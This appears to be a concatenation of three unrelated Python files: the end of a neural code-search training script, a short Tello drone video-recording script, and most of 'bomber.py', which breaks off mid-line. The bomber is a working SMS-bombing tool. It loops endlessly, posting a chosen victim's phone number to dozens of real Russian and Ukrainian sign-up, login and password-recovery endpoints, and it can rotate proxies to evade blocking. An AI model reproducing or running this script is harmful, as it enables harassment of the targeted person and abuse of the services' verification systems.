MAP={}, nDCG={}'.format(acc,mrr,map,ndcg)) return acc,mrr,map,ndcg ##### Compute Representation ##### def repr_code(self,model): methnames,apiseqs,tokens=self.load_use_data() padded_methnames = self.pad(methnames, self.data_params['methname_len']) padded_apiseqs = self.pad(apiseqs, self.data_params['apiseq_len']) padded_tokens = self.pad(tokens, self.data_params['tokens_len']) vecs=model.repr_code([padded_methnames,padded_apiseqs,padded_tokens],batch_size=1000) vecs=vecs.astype('float32') self.save_code_reprs(vecs, self.path+self.data_params['use_codevecs']) return vecs def search(self,model,query,n_results=10): desc=[self.convert(self.vocab_desc,query)]#convert desc sentence to word indices padded_desc = self.pad(desc, self.data_params['desc_len']) desc_repr=model.repr_desc([padded_desc]) desc_repr=desc_repr.astype('float32') codes=[] sims=[] threads=[] for i,code_reprs_chunk in enumerate(self._code_reprs): t = threading.Thread(target=self.search_thread, args = (codes,sims,desc_repr,code_reprs_chunk,i,n_results)) threads.append(t) for t in threads: t.start() for t in threads:#wait until all sub-threads finish t.join() return codes,sims def search_thread(self,codes,sims,desc_repr,code_reprs,i,n_results): #1. compute similarity chunk_sims=cos_np_for_normalized(normalize(desc_repr),code_reprs) #2. choose top results negsims=np.negative(chunk_sims[0]) maxinds = np.argpartition(negsims, kth=n_results-1) maxinds = maxinds[:n_results] chunk_codes=[self._code_base[i][k] for k in maxinds] chunk_sims=chunk_sims[0][maxinds] codes.extend(chunk_codes) sims.extend(chunk_sims) """ ================================================================== Python Data """ def load_python_codebase(self): """load codebase codefile: pickle that stores raw code """ logger.info('Loading codebase (chunk size={})..'.format(self._code_base_chunksize)) if self._code_base==None: codebase=[] codes=self.load_pickle(self.py_use_rawcode) #use codecs to read in case of encoding problem codebase.append(codes) self._code_base=codebase def load_use_transferred_python_data(self): logger.info('Loading use data..') logger.info('methname') methnames=self.load_hdf5(self.target_transferred_methnames,0,-1) logger.info('apiseq') apiseqs=self.load_hdf5(self.target_transferred_apiseqs,0,-1) logger.info('tokens') tokens=self.load_hdf5(self.target_transferred_tokens,0,-1) return methnames,apiseqs,tokens def load_transferred_pycode_reprs(self): logger.debug('Loading code vectors (chunk size={})..'.format(self._code_base_chunksize)) if self._pycode_reprs==None: """reads vectors (2D numpy array) from a hdf5 file""" codereprs=[] h5f = tables.open_file(self.py_use_codevec) vecs= h5f.root.vecs for i in range(0,len(vecs),self._code_base_chunksize): codereprs.append(vecs[i:i+self._code_base_chunksize]) h5f.close() self._pycode_reprs=codereprs return self._pycode_reprs def load_use_python_data(self): logger.info('Loading use python data..') logger.info('python methname') methnames=self.load_pickle(self.py_use_methname) #print(methnames) logger.info('python apiseq') apiseqs=self.load_pickle(self.py_use_apiseq) logger.info('python tokens') tokens=self.load_pickle(self.py_use_token) return methnames,apiseqs,tokens def load_pycode_reprs(self): logger.debug('Loading python code vectors (chunk size={})..'.format(self._code_base_chunksize)) if self._code_reprs==None: """reads vectors (2D numpy array) from a hdf5 file""" codereprs=[] h5f = tables.open_file(self.py_use_codevec) vecs= h5f.root.vecs for i in range(0,len(vecs),self._code_base_chunksize): codereprs.append(vecs[i:i+self._code_base_chunksize]) h5f.close() self._code_reprs=codereprs return self._code_reprs def repr_python_code(self, model): methnames,apiseqs,tokens=self.load_use_python_data() padded_methnames = self.pad(methnames, self.data_params['methname_len']) padded_apiseqs = self.pad(apiseqs, self.data_params['apiseq_len']) padded_tokens = self.pad(tokens, self.data_params['tokens_len']) vecs=model.repr_code([padded_methnames,padded_apiseqs,padded_tokens],batch_size=1000) vecs=vecs.astype('float32') self.save_code_reprs(vecs, self.py_use_codevec) return vecs def load_transferred_pycode_reprs(self): logger.debug('Loading transferred python code vectors (chunk size={})..'.format(self._code_base_chunksize)) if self._code_reprs==None: """reads vectors (2D numpy array) from a hdf5 file""" codereprs=[] h5f = tables.open_file(self.py_transferred_use_codevec) vecs= h5f.root.vecs for i in range(0,len(vecs),self._code_base_chunksize): codereprs.append(vecs[i:i+self._code_base_chunksize]) h5f.close() self._code_reprs=codereprs return self._code_reprs def repr_transferred_python_code(self, model): methnames,apiseqs,tokens=self.load_use_transferred_python_data() padded_methnames = self.pad(methnames, self.data_params['methname_len']) padded_apiseqs = self.pad(apiseqs, self.data_params['apiseq_len']) padded_tokens = self.pad(tokens, self.data_params['tokens_len']) vecs=model.repr_code([padded_methnames,padded_apiseqs,padded_tokens],batch_size=1000) vecs=vecs.astype('float32') self.save_code_reprs(vecs, self.py_transferred_use_codevec) return vecs def preprocess(self, model): cv = self.cv #py_desc = self.py_desc py_codebase = self.py_codebase raw_code = open(self.py_use_rawcode,"wb") code_list = [] """ index = 2490334 code = py_codebase.get(2490334) token = cv.getToken(code) token_vec = self.convert(self.vocab_tokens,token) """ keys = self.py_codebase.keys() token_list = [] methname_list = [] apiseq_list = [] """ index = 2490334 code = py_codebase.get(index) print(code) cv.printAST(code) methodname = cv.getMethodName(code) apiSequence = cv.getAPISequence(code) token = cv.getToken(code) token_vec = self.convert(self.vocab_tokens,token) methodname_vec = self.convert(self.vocab_methname,methodname) apiSequence_vec = self.convert(self.vocab_apiseq,apiSequence) print(methodname_vec) print(apiSequence_vec) print(token_vec) """ print("==================================================================================================") print("Embedding...") #""" for key in keys: code = py_codebase.get(key) #desc = py_desc.get(key) #print(code) try: token = cv.getToken(code) methodname = cv.getMethodName(code) apiSequence = cv.getAPISequence(code) except: #print("Error") continue else: token_vec = self.convert(self.vocab_tokens,token) methodname_vec = self.convert(self.vocab_methname,methodname) apiSequence_vec = self.convert(self.vocab_apiseq,apiSequence) token_list.append(token_vec) methname_list.append(methodname_vec) apiseq_list.append(apiSequence_vec) code_list.append(code) #desc_vec = self.convert(self.vocab_desc,desc) #""" pickle.dump(code_list,raw_code) raw_code.close() print("Embedding completed.") print("Saving...") self.save_pkl(token_list, self.py_use_token) self.save_pkl(methname_list, self.py_use_methname) self.save_pkl(apiseq_list, self.py_use_apiseq) print("Saved.") def save_pkl(self, data, filename): f = open(filename, 'wb') pickle.dump(data, f) f.close() ''' ======================================= Transfer ''' def transfer(self, method="TCA", source_size=5000, target_size=2000): Xs = [] Xt = [] print("Transfering Source Data ...") methnames, apiseqs, tokens = self.load_use_data() py_methnames, py_apiseqs, py_tokens = self.load_use_python_data() # Because the array is too large # If we don't cut it, there'll be memory error methnames = methnames[0:source_size] apiseqs = apiseqs[0:source_size] tokens = tokens[0:source_size] py_methnames = py_methnames[0:target_size] py_apiseqs = py_apiseqs[0:target_size] py_tokens = py_tokens[0:target_size] padded_methnames = self.pad(methnames, self.data_params['methname_len']) padded_apiseqs = self.pad(apiseqs, self.data_params['apiseq_len']) padded_tokens = self.pad(tokens, self.data_params['tokens_len']) padded_py_methnames = self.pad(py_methnames, self.data_params['methname_len']) padded_py_apiseqs = self.pad(py_apiseqs, self.data_params['apiseq_len']) padded_py_tokens = self.pad(py_tokens, self.data_params['tokens_len']) for i in range(len(padded_methnames)): temp = np.concatenate((padded_methnames[i], padded_apiseqs[i], padded_tokens[i]), axis=0) Xs.append(temp) for j in range(len(padded_py_methnames)): temp = np.concatenate((padded_py_methnames[j], padded_py_apiseqs[j], padded_py_tokens[j]), axis=0) Xt.append(temp) Xs = np.array(Xs) Xt = np.array(Xt) Xs_new = [] Xt_new = [] if method == "TCA": from TCA import TCA tca = TCA(Xs, Xt, dim=self.data_params['methname_len'] + self.data_params['apiseq_len'] + self.data_params['tokens_len']) Xs_new, Xt_new = tca.fit() # Xs_new cannot contain any negative value Xs_new = np.add(Xs_new,10) Xt_new = np.add(Xt_new,10) else: print("Unknown Transfer") return print("Transfer Completed") source_methnames_new = Xs_new[:, 0:self.data_params['methname_len']] source_apiseqs_new = Xs_new[:, self.data_params['methname_len']:self.data_params['apiseq_len']] source_tokens_new = Xs_new[:, self.data_params['apiseq_len']:self.data_params['tokens_len']] self.save_h5file(source_methnames_new, self.source_transferred_methnames) self.save_h5file(source_apiseqs_new, self.source_transferred_apiseqs) self.save_h5file(source_tokens_new, self.source_transferred_tokens) target_methnames_new = Xs_new[:, 0:self.data_params['methname_len']] target_apiseqs_new = Xs_new[:, self.data_params['methname_len']:self.data_params['apiseq_len']] target_tokens_new = Xs_new[:, self.data_params['apiseq_len']:self.data_params['tokens_len']] self.save_h5file(target_methnames_new, self.target_transferred_methnames) self.save_h5file(target_apiseqs_new, self.target_transferred_apiseqs) self.save_h5file(target_tokens_new, self.target_transferred_tokens) #self.save_code_reprs(Xs_new, self.transfer_Xs_new) self.save_code_reprs(Xt_new, self.transfer_Xt_new) return Xs_new, Xt_new def save_h5file(self, X, filename): data = _pack2Dto1D(X) h5file = open_file(filename, mode='w', title=filename) h5file.create_array("/", "phrases", data.astype('float32'), "1D Data array") table = h5file.create_table("/", 'indices', Index, 'Index of data') index = table.row offset = 0 for i in range(len(X)): length = len(X[i]) index['pos']= offset index['length'] = length index.append() offset += length table.flush() h5file.close() def _pack2Dto1D(X): R = [] for i in X: R = np.concatenate((R,i), axis=0) return R def parse_args(): parser = argparse.ArgumentParser("Train and Test Code Search(Embedding) Model") parser.add_argument("--proto", choices=["get_config"], default="get_config", help="Prototype config to use for config") parser.add_argument("--mode", choices=["train","eval","repr_code","search","repr_python_code","preprocess", "search_python", "transfer", "train_transferred", "repr_transferred_python_code", "search_transferred_python"], default='train', help="The mode to run. The `train` mode trains a model;" " the `eval` mode evaluat models in a test set " " The `repr_code/repr_desc` mode computes vectors" " for a code snippet or a natural language description with a trained model.") parser.add_argument("--verbose",action="store_true", default=True, help="Be verbose") return parser.parse_args() if __name__ == '__main__': args = parse_args() conf = getattr(configs, args.proto)() codesearcher = CodeSearcher(conf) ##### Define model ###### logger.info('Build Model') model = eval(conf['model_params']['model_name'])(conf)#initialize the model model.build() optimizer = conf.get('training_params', dict()).get('optimizer', 'adam') model.compile(optimizer=optimizer) if args.mode=='train': codesearcher.train(model) elif args.mode=='eval': # evaluate for a particular epoch #load model if conf['training_params']['reload']>0: codesearcher.load_model_epoch(model, conf['training_params']['reload']) codesearcher.eval(model,-1,10) elif args.mode=='repr_code': #load model if conf['training_params']['reload']>0: codesearcher.load_model_epoch(model, conf['training_params']['reload']) vecs=codesearcher.repr_code(model) elif args.mode=='search': #search code based on a desc if conf['training_params']['reload']>0: codesearcher.load_model_epoch(model, conf['training_params']['reload']) codesearcher.load_code_reprs() codesearcher.load_codebase() while True: try: query = input('Input Query: ') n_results = int(input('How many results? ')) except Exception: print("Exception while parsing your input:") traceback.print_exc() break codes,sims=codesearcher.search(model, query,n_results) zipped=zip(codes,sims) results = '\n\n'.join(map(str,zipped)) #combine the result into a returning string print(results) elif args.mode=='preprocess': codesearcher.preprocess(model) elif args.mode=='repr_python_code': codesearcher.repr_python_code(model) elif args.mode=='search_python': #search code based on a desc if conf['training_params']['reload']>0: codesearcher.load_model_epoch(model, conf['training_params']['reload']) codesearcher.load_pycode_reprs() codesearcher.load_python_codebase() while True: try: query = input('Input Query: ') n_results = int(input('How many results? ')) except Exception: print("Exception while parsing your input:") traceback.print_exc() break codes,sims=codesearcher.search(model, query,n_results) zipped=zip(codes,sims) results = '\n\n'.join(map(str,zipped)) #combine the result into a returning string print(results) elif args.mode=='transfer': codesearcher.transfer("TCA",10000,5000) elif args.mode=='repr_transferred_python_code': codesearcher.repr_transferred_python_code(model) elif args.mode=='train_transferred': codesearcher.train(model, True) elif args.mode== 'search_transferred_python': #search code based on a desc if conf['training_params']['reload']>0: codesearcher.load_model_epoch(model, conf['training_params']['reload']) codesearcher.load_transferred_pycode_reprs() codesearcher.load_python_codebase() while True: try: query = raw_input('Input Query: ') n_results = int(raw_input('How many results? ')) except Exception: print("Exception while parsing your input:") traceback.print_exc() break codes,sims=codesearcher.search(model, query,n_results) zipped=zip(codes,sims) results = '\n\n'.join(map(str,zipped)) #combine the result into a returning string print(results)
record_video.py
import time, cv2 from threading import Thread from djitellopy import Tello FPS = 30 tello = Tello() tello.connect() print("Battery level:", tello.get_battery()) keepRecording = True tello.streamon() frame_read = tello.get_frame_read() def video_recorder(): height, width, _ = frame_read.frame.shape video = cv2.VideoWriter('video.mp4', cv2.VideoWriter_fourcc(*'mp4v'), FPS, (width, height)) while keepRecording: start = time.time() video.write(frame_read.frame) time.sleep(1 / FPS - (time.time() - start)) video.release() # we need to run the recorder in a seperate thread, otherwise blocking options # would prevent frames from getting added to the video recorder = Thread(target=video_recorder) recorder.start() # tello.takeoff() # tello.move_up(100) # tello.rotate_counter_clockwise(360) # tello.land() start = time.time() while time.time() - start < 15: cv2.imshow("Drone", frame_read.frame) cv2.waitKey(1) keepRecording = False recorder.join() tello.end()
bomber.py
import requests, random from requests import get from bs4 import BeautifulSoup as bs import colorama from termcolor import colored from tkinter import filedialog as fd from tkinter import * from tkinter import messagebox from tkinter import Label from random import randint import threading, os, sys, time colorama.init() root = Tk() root.title('Sms Bomber, by HZ') root.geometry('500x400+300+200') def good(): print(colored('SMS sent', 'green')) def error(): print(colored('SMS not sent', 'red')) def spamNOproxy(phone): while True: _name = '' for x in range(12): _name = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) password = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) username = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) _email = _name + '@gmail.com' email = _name + '@gmail.com' _phone = phone _phone9 = _phone[1:] _phoneAresBank = '+' + _phone[0] + '(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11] _phone9dostavista = _phone9[:3] + '+' + _phone9[3:6] + '-' + _phone9[6:8] + '-' + _phone9[8:10] _phoneOstin = '+' + _phone[0] + '+(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11] _phonePizzahut = '+' + _phone[0] + ' (' + _phone[1:4] + ') ' + _phone[4:7] + ' ' + _phone[7:9] + ' ' + _phone[9:11] _phoneGorzdrav = _phone[1:4] + ') ' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11] _text = 'Ляля' phone1 = '+' + phone[0] + ' ' + '(' + phone[1] + phone[2] + phone[3] + ')' + ' ' + phone[4] + phone[5] + phone[6] + '-' + phone[7] + phone[8] + '-' + phone[9] + phone[10] phone2 = phone[1] + phone[2] + phone[3] + phone[4] + phone[5] + phone[6] + phone[7] + phone[8] + phone[9] + phone[10] try: requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': _phone}, headers={}) good() except Exception as e: error() try: requests.post('https://oauth.sovest.ru/oauth/authorize', data={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://gorzdrav.org/login/register/sms/send', data={'phone': _phone9}) good() except Exception as e: error() try: requests.get('https://www.sportmaster.ru/user/session/sendSmsCode.do?phone=+' + _phone + '&_=1580559110407') good() except Exception as e: error() try: requests.post('https://ctx.playfamily.ru/screenapi/v3/sendsmscode/web/1', data={'phone':_phone, 'password':password}) good() except Exception as e: error() try: requests.post('https://my.pozvonim.com/api/v1/auth/send/sms', data={'phone':_phone, 'origin':'https://my.pozvonim.com', 'referer':'https://my.pozvonim.com/register/', 'host':'my.pozvonim.com'}) good() except Exception as e: error() try: requests.get(('https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper?oper=9&callmode=1&phone=' + _phone), data={'host':'register.sipnet.ru', 'origin':'https://www.sipnet.ru', 'referer':'https://www.sipnet.ru/register'}) good() except Exception as e: error() try: requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber':_phone, 'countryCode':'ID', 'name':'test', 'email':'mail@mail.com', 'deviceToken':'*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'}) good() except Exception as e: error() try: requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://www.rabota.ru/remind', data={'credential': _phone}) good() except Exception as e: error() try: requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_name, 'phone':_phone, 'promo':'yellowforma'}) good() except Exception as e: error() try: requests.post('https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCodeForOtp', params={'pageName':'loginByUserPhoneVerification', 'fromCheckout':'false', 'fromRegisterPage':'true', 'snLogin':'', 'bpg':'', 'snProviderId':''}, data={'phone':'+7 915 3509908', 'g-recaptcha-response':'', 'recaptcha':'on'}) good() except Exception as e: error() try: requests.post('https://newnext.ru/graphql', json={'operationName':'registration', 'variables':{'client': {'firstName':'Иван', 'lastName':'Иванов', 'phone':_phone, 'typeKeys':['Unemployed']}}, 'query':'mutation registration($client: ClientInput!) {\n registration(client: $client) {\n token\n __typename\n }\n}\n'}) good() except Exception as e: error() try: requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/', json={'client_type':'personal', 'email':_email, 'mobile_phone':_phone, 'deliveryOption':'sms'}) good() except Exception as e: error() try: requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc':'2.0', 'protocol':'5', 'method':'Пользователь.ЗаявкаНаФизика', 'params':{'phone': _phone}, 'id':'1'}) good() except Exception as e: error() try: requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', json={'phone': '+' + _phone}) good() except Exception as e: error() try: requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={'phone': '+' + _phone}) good() except Exception as e: error() try: requests.post('https://cloud.mail.ru/api/v2/notify/applink', json={'phone':'+' + _phone, 'api':2, 'email':'email', 'x-email':'x-email'}) good() except Exception as e: error() try: requests.post('https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone', data={'st.r.phone': '+' + _phone}) good() except Exception as e: error() try: requests.post('https://plink.tech/register/', json={'phone': _phone}) good() except Exception as e: error() try: requests.post('http://smsgorod.ru/sendsms.php', data={'number': _phone}) good() except Exception as e: error() try: requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}) good() except Exception as e: error() try: requests.post('https://passport.twitch.tv/register?trusted_request=true', json={'birthday':{'day':15, 'month':12, 'year':1997}, 'client_id':'kd1unb4b3q4t58fwlpcbzcbnm76a8fp', 'include_verification_code':True, 'password':password, 'phone_number':_phone, 'username':username}) good() except Exception as e: error() try: requests.post('https://cabinet.wi-fi.ru/api/auth/by-sms', data={'msisdn': _phone}, headers={'App-ID': 'cabinet'}) good() except Exception as e: error() try: requests.post('https://eda.yandex/api/v1/user/request_authentication_code', json={'phone_number': '+' + _phone}) good() except Exception as e: error() try: requests.post('https://api-prime.anytime.global/api/v2/auth/sendVerificationCode', data={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://www.delivery-club.ru/ajax/user_otp', data={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', json={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://youdo.com/api/verification/sendverificationcode/', data={'PhoneE164': _phone}) good() except Exception as e: error() try: requests.post('https://www.citilink.ru/registration/confirm/phone/+' + _phone + '/') good() except Exception as e: error() try: requests.post('https://tehnosvit.ua/iwantring_feedback.html', data={'feedbackName':_name, 'feedbackPhone':'+' + _phone}) good() except Exception as e: error() try: requests.post('https://mobileplanet.ua/register', data={'klient_name':_name, 'klient_phone':'+' + _phone, 'klient_email':_email}) good() except Exception as e: error() try: requests.post('https://protovar.com.ua/aj_record', data={'object':'callback', 'user_name':_name, 'contact_phone':_phone[3:]}) good() except Exception as e: error() try: requests.post('https://e-vse.online/mail2.php', data={'telephone': '+' + _phone}) good() except Exception as e: error() try: requests.post('https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main&currentLocale=uk_UA', data={'firstname':_name, 'telephone':_phone[2:], 'email':_email, 'password':password, 'form_key':'Zqqj7CyjkKG2ImM8'}) good() except Exception as e: error() try: requests.post('https://secure.online.ua/ajax/check_phone/?reg_phone=%2B' + _phone[0:7] + '-' + _phone[8:11]) good() except Exception as e: error() try: requests.post('https://707taxi.com.ua/sendSMS.php', data={'tel': _phone[3:]}) good() except Exception as e: error() try: requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email}) good() except Exception as e: error() try: requests.post(f"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone={_phone}", data={'result': 'ok'}) good() except Exception as e: error() try: requests.post('https://my.citrus.ua/api/v2/register', data={'email':_email, 'name':_name, 'phone':_phone[2:], 'password':'fgfg', 'confirm_password':'fgfg'}) good() except Exception as e: error() try: requests.post('https://www.nl.ua', data={'component':'bxmaker.authuserphone.login', 'sessid':'bf70db951f54b837748f69b75a61deb4', 'method':'sendCode', 'phone':_phone, 'registration':'N'}) good() except Exception as e: error() try: requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': phone}) good() except Exception as e: error() try: requests.post('https://api.tinkoff.ru/v1/sign_up', data={'phone': '+' + phone}) good() except Exception as e: error() try: requests.post('https://api.mtstv.ru/v1/users', data={'msisdn': phone}) good() except Exception as e: error() try: a = requests.get('https://driver.gett.ru/signup/') requests.post('https://driver.gett.ru/api/login/phone/', data={'phone':phone, 'registration':'true'}, headers={'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'csrftoken=' + a.cookies['csrftoken'] + '; _ym_uid=1547234164718090157; _ym_d=1547234164; _ga=GA1.2.2109386105.1547234165; _ym_visorc_46241784=w; _gid=GA1.2.1423572947.1548099517; _gat_gtag_UA_107450310_1=1; _ym_isad=2', 'Host':'driver.gett.ru', 'Referer':'https://driver.gett.ru/signup/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-CSRFToken':a.cookies['csrftoken']}) good() except Exception as e: error() try: requests.post('https://api.ivi.ru/mobileapi/user/register/phone/v6/', data={'phone': phone}, headers={'Accept-Language':'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'Connection':'keep-alive', 'Host':'api.ivi.ru', 'origin':'https://www.ivi.ru/', 'Referer':'https://www.ivi.ru/profile'}) good() except Exception as e: error() try: b = requests.session() b.get('https://drugvokrug.ru/siteActions/processSms.htm') requests.post('https://drugvokrug.ru/siteActions/processSms.htm', data={'cell': phone}, headers={'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'JSESSIONID=' + b.cookies['JSESSIONID'] + ';', 'Host':'drugvokrug.ru', 'Referer':'https://drugvokrug.ru/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-Requested-With':'XMLHttpRequest'}) good() except Exception as e: error() try: rutaxi = requests.post('https://moscow.rutaxi.ru/ajax_keycode.html', data={'l': phone[1:]}) good() except Exception as e: error() try: rutube = requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + phone}) good() except Exception as e: error() try: psbank = requests.post('https://ib.psbank.ru/api/authentication/extendedClientAuthRequest', json={'firstName':'Иван', 'middleName':'Иванович', 'lastName':'Иванов', 'sex':'1', 'birthDate':'10.10.2000', 'mobilePhone':phone[1:], 'russianFederationResident':'true', 'isDSA':'false', 'personalDataProcessingAgreement':'true', 'bKIRequestAgreement':'null', 'promotionAgreement':'true'}) good() except Exception as e: error() try: beltelecom = requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone}) good() except Exception as e: error() try: modulbank = requests.post('https://my.modulbank.ru/api/v2/registration/nameAndPhone', json={'FirstName':'Саша', 'CellPhone':phone[1:], 'Package':'optimal'}) good() except Exception as e: error() try: data = {'form[NAME]':'Иван', 'form[PERSONAL_GENDER]':'M', 'form[PERSONAL_BIRTHDAY]':'11.02.2000', 'form[EMAIL]':'fbhbdfvbd@gmail.com', 'form[LOGIN]':phone1, 'form[PASSWORD]':None, 'get-new-password':'Получите пароль по SMS', 'user_agreement':'on', 'personal_data_agreement':'on', 'formType':'full', 'utc_offset':180} aptkru = requests.post('https://apteka.ru/_action/auth/getForm/', data=data) good() except Exception as e: error() try: tvzavr = requests.post('https://www.tvzavr.ru/api/3.1/sms/send_confirm_code?plf=tvz&phone=' + phone + '&csrf_value=a222ba2a464543f5ac6ad097b1e92a49') good() except Exception as e: error() try: cook = requests.post('https://www.netprint.ru/order/profile') headers = {'Accept':'application/json, text/javascript, */*; q=0.01', 'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7', 'Connection':'keep-alive', 'Content-Length':145, 'Cookie':'unbi=' + cook.cookies['unbi'], 'Host':'www.netprint.ru', 'Origin':'https://www.netprint.ru', 'Referer':'https://www.netprint.ru/order/profile', 'Sec-Fetch-Mode':'cors', 'Sec-Fetch-Site':'same-origin', 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 OPR/65.0.3467.48', 'X-Requested-With':'XMLHttpRequest'} netprint = requests.post('https://www.netprint.ru/order/social-auth', headers=headers, data={'operation':'stdreg', 'email_or_phone':phonew, 'i_agree_with_terms':1}) good() except Exception as e: error() try: requests.post('http://youdrive.today/login/web/phone', data={'phone':phone, 'phone_code':7}) good() except Exception as e: error() try: requests.get('https://www.oyorooms.com/api/pwa/generateotp?phone=' + phone + '&country_code=%2B7&nod=4&locale=en') good() except Exception as e: error() try: requests.post('https://api.carsmile.com/', json={'operationName':'enterPhone', 'variables':{'phone': phone}, 'query':'mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n'}) good() except Exception as e: error() try: requests.post('https://api.delitime.ru/api/v2/signup', data={'SignupForm[username]':phone, 'SignupForm[device_type]':3}) good() except Exception as e: error() try: requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php', data={'msisdn':phone, 'locale':'en', 'countryCode':'ru', 'version':'1', 'k':'ic1rtwz1s1Hj1O0r', 'r':'46763'}) good() except Exception as e: error() try: requests.post('https://terra-1.indriverapp.com/api/authorization?locale=ru', data={'mode':'request', 'phone':'+' + phone, 'phone_permission':'unknown', 'stream_id':0, 'v':3, 'appversion':'3.20.6', 'osversion':'unknown', 'devicemodel':'unknown'}) good() except Exception as e: error() try: password = ''.join(random.choice(string.ascii_letters) for _ in range(6)) requests.post('https://lk.invitro.ru/sp/mobileApi/createUserByPassword', data={'password':password, 'application':'lkp', 'login':'+' + phone}) good() except Exception as e: error() try: requests.post('https://qlean.ru/clients-api/v2/sms_codes/auth/request_code', json={'phone': phone}) good() except Exception as e: error() try: requests.get('https://findclone.ru/register?phone=+' + phone) good() except Exception as e: error() try: requests.post('https://mobile.vkusvill.ru:40113/api/user/', data={'Phone_number':_phone9, 'version':'2'}, headers={}) good() except Exception as e: error() try: requests.post('http://taxiseven.ru/auth/register', data={'phone': _phone}, headers={}) good() except Exception as e: error() try: requests.post('https://security.wildberries.ru/mobile/requestconfirmcode?forAction=RegisterUser', data={'phone': '+' + _phone}, headers={}) good() except Exception as e: error() try: requests.post('https://www.rabota.ru/remind', data={'credential': _phone}) good() except Exception as e: error() try: requests.post('https://fastmoney.ru/auth/registration', data={'RegistrationForm[username]':'+' + _phone, 'RegistrationForm[password]':'12345', 'RegistrationForm[confirmPassword]':'12345', 'yt0':'Регистрация'}) good() except Exception as e: error() try: requests.post('https://ube.pmsm.org.ru/esb/iqos-reg/submission', json={'data': {'firstName':_text, 'lastName':'***', 'phone':_phone, 'email':_name + '@gmail.com', 'password':_name, 'passwordConfirm':_name}}) good() except Exception as e: error() try: requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_text, 'phone':_phone}) good() except Exception as e: error() try: requests.post('https://login.mos.ru/sps/recovery/start', json={'login':_phone, 'attr':''}) good() except Exception as e: error() try: requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': _phone}) good() except Exception as e: error() try: requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email}) good() except Exception as e: error() def spamProxy(phone): while True: def proxy(): with open(file_name) as file: list_proxy = file.read().split('\n') random_proxy_count = randint(0, len(list_proxy) - 1) try: proxies = {'http': list_proxy[random_proxy_count].split(' ')[1]} return proxies except: proxies = {'http': list_proxy[(random_proxy_count - 1)].split(' ')[1]} return proxies _name = '' for x in range(12): _name = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) password = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) username = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) _email = _name + '@gmail.com' email = _name + '@gmail.com' _phone = phone _phone9 = _phone[1:] _phoneAresBank = '+' + _phone[0] + '(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11] _phone9dostavista = _phone9[:3] + '+' + _phone9[3:6] + '-' + _phone9[6:8] + '-' + _phone9[8:10] _phoneOstin = '+' + _phone[0] + '+(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11] _phonePizzahut 